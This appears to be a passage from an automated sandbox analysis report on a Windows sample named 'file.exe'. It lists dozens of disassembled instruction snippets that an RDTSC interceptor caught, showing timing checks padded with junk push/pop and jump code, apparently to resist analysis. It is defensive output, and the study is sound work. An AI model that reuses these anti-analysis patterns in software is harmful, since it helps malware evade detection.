                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA61E4 second address: DA61F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1770B77E96h 0x00000008 jnc 00007F1770B77E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA61F8 second address: DA6230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F1770F379FBh 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push ecx 0x00000016 jmp 00007F1770F37A08h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA0D6 second address: DAA0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA0DA second address: DAA0E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3FFD second address: CF4003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA94A6 second address: DA94B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jp 00007F1770F379F6h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9605 second address: DA9609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9609 second address: DA960D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB021A second address: DB0224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1770B77E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0224 second address: DB022E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB022E second address: DB0234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0234 second address: DB0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0375 second address: DB0393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77EA6h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0684 second address: DB0690 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jne 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0690 second address: DB06A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F1770B77E96h 0x0000000a jng 00007F1770B77E96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB07DC second address: DB07E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB07E8 second address: DB07ED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB07ED second address: DB0811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 jmp 00007F1770F379FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jg 00007F1770F379FEh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0811 second address: DB0817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB097C second address: DB0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0C56 second address: DB0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jl 00007F1770B77E96h 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB0C63 second address: DB0C68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB0C68 second address: DB0C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBA66B second address: DBA683 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F1770F37A02h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBA683 second address: DBA688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBA122 second address: DBA12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBA12D second address: DBA131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBC9AA second address: DBC9B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBC9B3 second address: DBC9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1770B77E96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC3818 second address: DC3839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A01h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F1770F379F6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC3839 second address: DC38B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1770B77EA6h 0x0000000d popad 0x0000000e pushad 0x0000000f jp 00007F1770B77EA6h 0x00000015 pushad 0x00000016 jmp 00007F1770B77EA6h 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F1770B77EA5h 0x00000027 jmp 00007F1770B77E9Fh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC3686 second address: DC36B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F37A01h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jne 00007F1770F37A03h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC36B9 second address: DC36DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F1770B77EACh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F1770B77EA4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DCB8C9 second address: DCB8D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 jng 00007F1770F379FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DCB2A5 second address: DCB2B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F1770B77E96h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD0B34 second address: DD0B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD0B39 second address: DD0B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD082A second address: DD083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD083A second address: DD083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD083E second address: DD0842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDCACB second address: DDCAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDCAD1 second address: DDCADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F1770F379F6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4F47 second address: DE4F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4F63 second address: DE4F77 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1770F37A06h 0x00000008 jmp 00007F1770F379FAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE38D0 second address: DE38D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE38D6 second address: DE38DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE3EA4 second address: DE3EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE3EAA second address: DE3EC0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F1770F379FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE404A second address: DE4050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE415F second address: DE416E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F1770F379F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE416E second address: DE4172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4172 second address: DE4178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE42C2 second address: DE42FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1770B77E96h 0x0000000a jmp 00007F1770B77EA1h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 js 00007F1770B77EA0h 0x0000001f jmp 00007F1770B77E9Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4CA8 second address: DE4CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE74C2 second address: DE74C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEA29A second address: DEA29E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE9E91 second address: DE9E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE9E97 second address: DE9E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE9E9B second address: DE9EBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1770B77EA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1770B77E9Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE9EBF second address: DE9EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE9EC6 second address: DE9ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F1770B77E96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEA014 second address: DEA01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1770F379F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEC45B second address: DEC46B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push esi 0x00000008 push ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF9832 second address: DF9849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F1770F379FFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF969E second address: DF96A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF96A2 second address: DF96D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F1770F37A0Ch 0x00000012 jmp 00007F1770F37A00h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF96D8 second address: DF96DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF96DC second address: DF96EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1770F379F6h 0x0000000a jo 00007F1770F379F6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF96EC second address: DF96F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF96F0 second address: DF96FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jbe 00007F1770F379F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF6400 second address: DF642B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1770B77EA4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jne 00007F1770B77EAAh 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F1770B77E96h 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF642B second address: DF642F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E16E9E second address: E16EA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E171A9 second address: E171B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007F1770F379F6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E175E1 second address: E17606 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1770B77E9Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a ja 00007F1770B77E96h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F1770B77E9Dh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E17787 second address: E17791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1770F379F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E17791 second address: E17795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E17795 second address: E1779D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E1779D second address: E177A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E177A3 second address: E177A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E17A5A second address: E17A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E17A5E second address: E17A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E17A62 second address: E17A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E17A75 second address: E17A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F1770F379F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E17A83 second address: E17A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E17A8B second address: E17AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F37A06h 0x00000009 popad 0x0000000a jg 00007F1770F37A0Eh 0x00000010 jmp 00007F1770F379FCh 0x00000015 jmp 00007F1770F379FCh 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E1A662 second address: E1A668 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E1A8BF second address: E1A8C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E1A8C5 second address: E1A8CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E1A8CA second address: E1A8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E1AC56 second address: E1AC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edx, 53ECE390h 0x0000000d push dword ptr [ebp+1245EF73h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F1770B77E98h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D2926h] 0x00000033 push A7F35DE4h 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b pushad 0x0000003c popad 0x0000003d pop esi 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100247 second address: 510024B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 510024B second address: 5100251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100251 second address: 510026B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770F37A06h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 510026B second address: 51002AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bl, al 0x0000000f pushfd 0x00000010 jmp 00007F1770B77EA1h 0x00000015 sub cl, FFFFFFD6h 0x00000018 jmp 00007F1770B77EA1h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51002AF second address: 51002B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51002B3 second address: 51002B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51002B7 second address: 51002BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51002BD second address: 5100300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1770B77E9Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1770B77EA7h 0x00000018 rdtsc
